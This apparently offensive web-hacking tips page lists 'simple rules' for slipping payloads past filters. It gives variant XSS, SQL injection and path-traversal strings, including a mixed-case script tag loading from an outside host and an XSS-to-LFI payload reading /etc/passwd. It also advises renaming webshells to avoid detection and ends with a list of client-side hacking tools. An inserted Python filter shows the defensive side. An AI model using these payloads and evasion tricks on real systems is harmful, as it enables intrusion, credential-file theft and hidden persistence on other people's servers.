Follow Simple Rules
Stop using alert('xss'). You should now use prompt('xss').
Don't do <script>. Do <ScRIPT x src=//0x.lv?
For blind SQL injections, stop using ' or 1=1--. Use ' or 2=2--.
For SQL injections, stop using UNION SELECT. Use UNION ALL SELECT.
Don’t do /etc/passwd. Do /foo/../etc/bar/../passwd.
Don’t call your webshell c99.php, shell.aspx or cmd.jsp. Call it rofl.php.
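Each rule above swaps one spelling of a payload for another, which is why literal signatures miss them. As an added example (not part of the original page), here is a filter that decodes and canonicalizes input first, then matches the class of payload; the rule names, function names and the watch list of paths are assumptions made for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Each rule matches a class of input rather than one literal string.
RULES = {
    "script_tag": re.compile(r"<\s*script\b", re.I),            # any letter case
    "js_dialog": re.compile(r"\b(?:alert|prompt|confirm)\s*\(", re.I),
    "sql_tautology": re.compile(r"\bor\s+(\d+)\s*=\s*\1\b", re.I),  # N=N, any N
    "sql_union": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
}
SENSITIVE_PATHS = {"/etc/passwd", "/etc/shadow"}  # assumed watch list


def canonicalize(value: str, max_rounds: int = 3) -> str:
    """URL-decode repeatedly (bounded) so nested encoding is unwrapped."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def findings(raw: str) -> set:
    """Return the names of all rules that fire on one request parameter."""
    value = canonicalize(raw)
    hits = {name for name, rx in RULES.items() if rx.search(value)}
    # Resolve "." and ".." segments before comparing against the watch list.
    for token in re.findall(r"/[^\s'\"<>]*", value):
        if posixpath.normpath(token) in SENSITIVE_PATHS:
            hits.add("sensitive_path")
    return hits


if __name__ == "__main__":
    # Inputs taken from the rules above, plus one constructed benign value.
    for sample in ["<ScRIPT x src=//0x.lv?", "' or 2=2--",
                   "/foo/../etc/bar/../passwd", "page=/docs/intro.html"]:
        print(repr(sample), "->", sorted(findings(sample)))
```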
XSS to LFI
<script>document.write(%27<iframe%20src=file:///etc/passwd></iframe>%27);</script>
XSS extensions
The client-side hacker's toolkit:
1 DevTools
2 DOM Logger++
3 DOM Invader or Eval Villain
4 https://de4js.kshift.me
5 Humanify
6 JSWZL